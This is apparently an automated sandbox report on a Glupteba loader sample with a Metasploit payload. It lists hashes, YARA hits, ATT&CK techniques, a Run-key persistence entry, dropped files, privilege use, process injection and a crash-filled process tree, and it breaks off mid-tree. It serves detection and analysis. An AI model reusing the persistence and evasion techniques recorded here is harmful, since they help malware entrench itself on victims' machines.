glupteba | a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e

General

Target

a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
Size

3.9MB
MD5

5625cb2982b7118b5e262fcfea2f4851
SHA1

f34e4c803b7b89d5342d50aa42b2cbd55845e373
SHA256

a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e
SHA512

78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0
SSDEEP

98304:EPOjA7HxZYd828AdJitFsozsNoQIU1ckttckumEeJWs:EWk7RZF4yil+QIU12s

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 8 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5044-133-0x0000000001470000-0x0000000001C74000-memory.dmp	family_glupteba
behavioral2/memory/5044-134-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/5044-136-0x0000000001470000-0x0000000001C74000-memory.dmp	family_glupteba
behavioral2/memory/5044-137-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/2076-138-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/2076-145-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/3868-146-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/3868-153-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 3580 created 5044	3580	svchost.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
PID 3580 created 3868	3580	svchost.exe	csrss.exe
PID 3580 created 3868	3580	svchost.exe	csrss.exe
PID 3580 created 3868	3580	svchost.exe	csrss.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

3868 csrss.exe
3748 patch.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

2040 netsh.exe

pid	process
3868	csrss.exe
3748	patch.exe

pid	process
2040	netsh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WanderingSnowflake = "\"C:\\Windows\\rss\\csrss.exe\""	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

384 bcdedit.exe

pid	process
384	bcdedit.exe

Drops file in Windows directory 2 IoCs

Processes:

a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
File opened for modification	C:\Windows\rss	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe

Program crash 58 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2136	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
3432	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
1100	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4016	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
5092	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
1400	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
1556	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
5036	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4936	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
3796	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4812	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
480	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4964	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
308	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
3692	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4068	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
2252	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
3516	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
628	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4316	5044	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
2856	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
1832	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
3164	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
2688	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
2200	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4884	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
3340	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
5052	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
1588	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
2396	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4400	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
820	2076	WerFault.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
4320	3868	WerFault.exe	csrss.exe
968	3868	WerFault.exe	csrss.exe
3680	3868	WerFault.exe	csrss.exe
4000	3868	WerFault.exe	csrss.exe
3132	3868	WerFault.exe	csrss.exe
3904	3868	WerFault.exe	csrss.exe
1896	3868	WerFault.exe	csrss.exe
4824	3868	WerFault.exe	csrss.exe
4528	3868	WerFault.exe	csrss.exe
1644	3868	WerFault.exe	csrss.exe
5092	3868	WerFault.exe	csrss.exe
1484	3868	WerFault.exe	csrss.exe
932	3868	WerFault.exe	csrss.exe
3988	3868	WerFault.exe	csrss.exe
4792	3868	WerFault.exe	csrss.exe
3532	3868	WerFault.exe	csrss.exe
4736	3868	WerFault.exe	csrss.exe
4192	3868	WerFault.exe	csrss.exe
1660	3868	WerFault.exe	csrss.exe
2416	3868	WerFault.exe	csrss.exe
4700	3868	WerFault.exe	csrss.exe
1516	3868	WerFault.exe	csrss.exe
3476	3868	WerFault.exe	csrss.exe
432	3868	WerFault.exe	csrss.exe
3240	3868	WerFault.exe	csrss.exe
5048	3868	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1556 schtasks.exe
5036 schtasks.exe

pid	process
1556	schtasks.exe
5036	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	csrss.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exea7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.execsrss.exe

pid	process
5044	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
5044	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
2076	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
2076	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
3868	csrss.exe
3868	csrss.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exesvchost.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	5044	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
Token: SeImpersonatePrivilege	5044	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
Token: SeTcbPrivilege	3580	svchost.exe
Token: SeTcbPrivilege	3580	svchost.exe
Token: SeBackupPrivilege	3580	svchost.exe
Token: SeRestorePrivilege	3580	svchost.exe
Token: SeBackupPrivilege	3580	svchost.exe
Token: SeRestorePrivilege	3580	svchost.exe
Token: SeBackupPrivilege	3580	svchost.exe
Token: SeRestorePrivilege	3580	svchost.exe
Token: SeBackupPrivilege	3580	svchost.exe
Token: SeRestorePrivilege	3580	svchost.exe
Token: SeSystemEnvironmentPrivilege	3868	csrss.exe
Token: SeBackupPrivilege	3580	svchost.exe
Token: SeRestorePrivilege	3580	svchost.exe
Token: SeBackupPrivilege	3580	svchost.exe
Token: SeRestorePrivilege	3580	svchost.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

svchost.exea7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.execmd.execsrss.exe

description	pid	process	target process
PID 3580 wrote to memory of 2076	3580	svchost.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
PID 3580 wrote to memory of 2076	3580	svchost.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
PID 3580 wrote to memory of 2076	3580	svchost.exe	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
PID 2076 wrote to memory of 3468	2076	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe	cmd.exe
PID 2076 wrote to memory of 3468	2076	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe	cmd.exe
PID 3468 wrote to memory of 2040	3468	cmd.exe	netsh.exe
PID 3468 wrote to memory of 2040	3468	cmd.exe	netsh.exe
PID 2076 wrote to memory of 3868	2076	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe	csrss.exe
PID 2076 wrote to memory of 3868	2076	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe	csrss.exe
PID 2076 wrote to memory of 3868	2076	a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe	csrss.exe
PID 3580 wrote to memory of 1556	3580	svchost.exe	schtasks.exe
PID 3580 wrote to memory of 1556	3580	svchost.exe	schtasks.exe
PID 3580 wrote to memory of 5036	3580	svchost.exe	schtasks.exe
PID 3580 wrote to memory of 5036	3580	svchost.exe	schtasks.exe
PID 3580 wrote to memory of 3748	3580	svchost.exe	patch.exe
PID 3580 wrote to memory of 3748	3580	svchost.exe	patch.exe
PID 3868 wrote to memory of 384	3868	csrss.exe	bcdedit.exe
PID 3868 wrote to memory of 384	3868	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
"C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 328
2⤵
- Program crash
PID:2136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 332
2⤵
- Program crash
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 332
2⤵
- Program crash
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 604
2⤵
- Program crash
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 696
2⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 712
2⤵
- Program crash
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 712
2⤵
- Program crash
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 752
2⤵
- Program crash
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 776
2⤵
- Program crash
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 624
2⤵
- Program crash
PID:3796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 696
2⤵
- Program crash
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 868
2⤵
- Program crash
PID:480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 696
2⤵
- Program crash
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 760
2⤵
- Program crash
PID:308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 684
2⤵
- Program crash
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 628
2⤵
- Program crash
PID:4068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 788
2⤵
- Program crash
PID:2252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 856
2⤵
- Program crash
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 916
2⤵
- Program crash
PID:628

C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe
"C:\Users\Admin\AppData\Local\Temp\a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e.exe"
2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 292
3⤵
- Program crash
PID:2856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 296
3⤵
- Program crash
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 296
3⤵
- Program crash
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 576
3⤵
- Program crash
PID:2688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 592
